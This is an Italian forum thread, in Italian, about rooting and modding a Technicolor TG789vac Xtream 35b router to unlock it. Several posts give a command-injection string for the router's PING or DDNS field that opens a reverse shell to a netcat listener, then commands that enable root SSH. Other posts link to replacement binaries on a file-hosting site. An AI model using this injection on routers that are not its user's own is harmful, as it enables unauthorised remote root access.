[GUIDA] Root e Modding TG789vac Xtream 35b (VBNT-F)

  • 618 Risposte
  • 306862 Visite

0 Utenti e 1 Visitatore stanno visualizzando questo topic.

Offline larsen64it

  • VIP
  • *****
  • 2696
Re:Firmware per TG789vac Xtream 35b
« Risposta #435 il: 03 Febbraio 2020, 12:13 »

Offline larsen64it

  • VIP
  • *****
  • 2696
Re:Firmware per TG789vac Xtream 35b
« Risposta #436 il: 04 Febbraio 2020, 21:02 »
Procedura semplificata per lo sblocco:
Mettere netcat in ascolto
nc -lvvp 1337
Se il firmware è vulnerabile sul campo  PING inserite la seguente stringa
Codice: [Seleziona]
:::::::; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet IP-PC 1337 >/tmp/f &Se il firmware è vulnerabile sul campo DDNS  inserite la seguente stringa
Codice: [Seleziona]
www.ooo.com; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet IP-PC 1337 >/tmp/f &Attendere un attimo e su netcat apparirà la shell  #
Citazione
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd;uci set dropbear.@dropbear[0].PasswordAuth='on';uci set dropbear.@dropbear[0].Interface='lan';uci set dropbear.@dropbear[0].RootPasswordAuth='on';uci set dropbear.@dropbear[0].RootLogin='1';uci set dropbear.@dropbear[0].enable='1';uci set system.@coredump[0].reboot='0';sed -i 's/#//' /etc/inittab;uci commit;/etc/init.d/dropbear restart
Fatto

Con l'occasione ho aggiornato la lista pacchetti.
« Ultima modifica: 16 Febbraio 2020, 04:30 da larsen64it »

Offline LuKePicci

  • Global Moderator
  • VIP
  • *****
  • 2789
Re:Firmware per TG789vac Xtream 35b
« Risposta #437 il: 05 Febbraio 2020, 02:57 »
Ma scusa AutoFlashGUI da solo non ci riesce? (Generic Ping/Generic DDNS) ?

PS: c'è del bbcode rimasuglio nel comando di sblocco dove disabiliti coredump

Offline larsen64it

  • VIP
  • *****
  • 2696
Re:Firmware per TG789vac Xtream 35b
« Risposta #438 il: 05 Febbraio 2020, 06:34 »
Grazie meglio di così non mi viene.
Ti rispondo da quel ignorantone che sono, non ho mai usato AutoFlashGUI per nessun router, ma credo che funzioni visto che sono comandi standard.

Offline LuKePicci

  • Global Moderator
  • VIP
  • *****
  • 2789
Re:Firmware per TG789vac Xtream 35b
« Risposta #439 il: 05 Febbraio 2020, 13:24 »
Manco io l'ho mai usato eheheh
Però devo a breve aggiungere anche questo modello sulla wiki internazionale e tra i metodi già documentati c'è AFG quindi mi viene comodo indicare quello.

Offline larsen64it

  • VIP
  • *****
  • 2696
Re:Firmware per TG789vac Xtream 35b
« Risposta #440 il: 06 Febbraio 2020, 17:41 »
Bug fix per la configurazione di samba e pianificazione wireless (tod)  della gui + attivazione wifi guest (sostituite bla bla bla con i vostri dati).
https://anonfile.com/r5laocWfn7/config.tar_gz
Bug fix miniupnpd in quanto per alcuni programmi (emule) non funziona.  Fate una copia di /usr/sbin/miniupnpd-igdv1 e miniupnpd-igdv2 e sostituitelo con il seguente file e rinominatelo come i 2 file sostituiti. Si potrebbe fare anche un fix come sui dga.
https://anonfile.com/1bl4o5Wan4/miniupnpd
Attenzione al minidlna: in sede di inizializzazione potrebbe cancellare il contenuto del supporto.
A questo punto questo router può/potrebbe vantare gli stessi strumenti e app  di tutti gli altri  router tch, luci a parte (per quello che serve).


Offline andrewred

  • Nuovo Iscritto
  • *
  • 34
Re:Firmware per TG789vac Xtream 35b
« Risposta #441 il: 15 Febbraio 2020, 13:02 »
Una volta ottenuto accesso root sul TG789vac Xtream 35b Fastweb con firmware Jade, è possibile bypassare la GUI dell'operatore e impostare parametri di un altro operatore? L'utility di Ansuel AGTEF unlocker si blocca con l'avviso che non è possibile ultimare la procedura. E resta la GUI originale.
Sicuramente sarà già stato spiegato .... ringrazio per le istruzioni relative all'ottenimento dell'accesso root, la procedura ha funzionato benissimo.

Offline larsen64it

  • VIP
  • *****
  • 2696
Re:Firmware per TG789vac Xtream 35b
« Risposta #442 il: 15 Febbraio 2020, 14:16 »
La fui funziona bene con l'ultimo firmware disponibile 16.2.8706 iad o mos che sia.
Per installarla non si usa  l'unlocker AGTEF, ma come su tutti gli altri technicolor.
Se off line scarica la gui e mettila in /tmp
Se on line
curl -k https://raw.githubusercontent.com/Ansuel/gui-dev-build-auto/master/GUI_dev.tar.bz2 --output /tmp/GUI_dev.tar.bz2
Poi i tutti i due i casi
bzcat /tmp/GUI_dev.tar.bz2 | tar -C / -xvf -
/etc/init.d/rootdevice debug

Offline andrewred

  • Nuovo Iscritto
  • *
  • 34
Re:Firmware per TG789vac Xtream 35b
« Risposta #443 il: 15 Febbraio 2020, 17:28 »
 Grazie larsen64it, appena posso provo e comunicherò risultato. Quando i miei amici che cambiano operatore dicono 'buttare via' le mie orecchie intendono 'recuperare' e con l'ausilio vostro in genere si riesce a 'recuperare' un buon muletto.

Offline larsen64it

  • VIP
  • *****
  • 2696
Re:Firmware per TG789vac Xtream 35b
« Risposta #444 il: 15 Febbraio 2020, 20:31 »
Non lo dire a me. Più vecchio è e meglio è, io in primis... anche se c'è poco da recuperare.

Offline LuKePicci

  • Global Moderator
  • VIP
  • *****
  • 2789
Re:Firmware per TG789vac Xtream 35b
« Risposta #445 il: 16 Febbraio 2020, 00:09 »
@larsen64it credo che nella prima variante del comando manchi la porta 1337 proposta subito prima

Mettere netcat in ascolto
nc -lvvp 1337
Se il firmware è vulnerabile sul campo  PING inserite la seguente stringa
Codice: [Seleziona]
:::::::; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet IP-PC >/tmp/f &...

Offline larsen64it

  • VIP
  • *****
  • 2696
Re:Firmware per TG789vac Xtream 35b
« Risposta #446 il: 16 Febbraio 2020, 04:31 »
Corretta anche questa grazie... eppure l'avevo appena detto.
Citazione
Più vecchio è e meglio è, io in primis... anche se c'è poco da recuperare.

Offline andrewred

  • Nuovo Iscritto
  • *
  • 34
Re:Firmware per TG789vac Xtream 35b
« Risposta #447 il: 16 Febbraio 2020, 08:21 »
Eseguito alla lettera, ma al riavvio dopo iniziale logo Technicolor e richiesta credenziali (admin/admin, se provo deliberatamente altre credenziali mi da giustamente errore) dopo la verifica delle stesse, entro in una schermata da cui non posso fare nulla. Le tiles configurazione guidata, schede etc . non si aprono. Riproverò intera procedura.
P.S.: il tasto reset non funziona più.
« Ultima modifica: 16 Febbraio 2020, 08:25 da andrewred »

Offline larsen64it

  • VIP
  • *****
  • 2696
Re:Firmware per TG789vac Xtream 35b
« Risposta #448 il: 16 Febbraio 2020, 09:10 »
L'importante che sei con l'ultimo firmware con quelli vecchi la gui non funziona. Probabile che si sia incasinato con l'unlocker.
Per fare il "reset" basta che cancelli la cartella  /overlay/bank_1 (sei in bank_1 vero?)
Prima pero prova con router on line ha dare il comando upgradegui per vedere se le cose cambiano.
« Ultima modifica: 16 Febbraio 2020, 09:33 da larsen64it »

Offline andrewred

  • Nuovo Iscritto
  • *
  • 34
Re:Firmware per TG789vac Xtream 35b
« Risposta #449 il: 16 Febbraio 2020, 09:39 »
Ho interrotto e spento router quindi ricomincio da zero con netcat e via dicendo. Mi sembra di aver visto durante la precedente procedura che abbia effettuato uno switch sul bank 2, ma devo appunto ripartire e verificare. Se ci riesco.
« Ultima modifica: 16 Febbraio 2020, 09:43 da andrewred »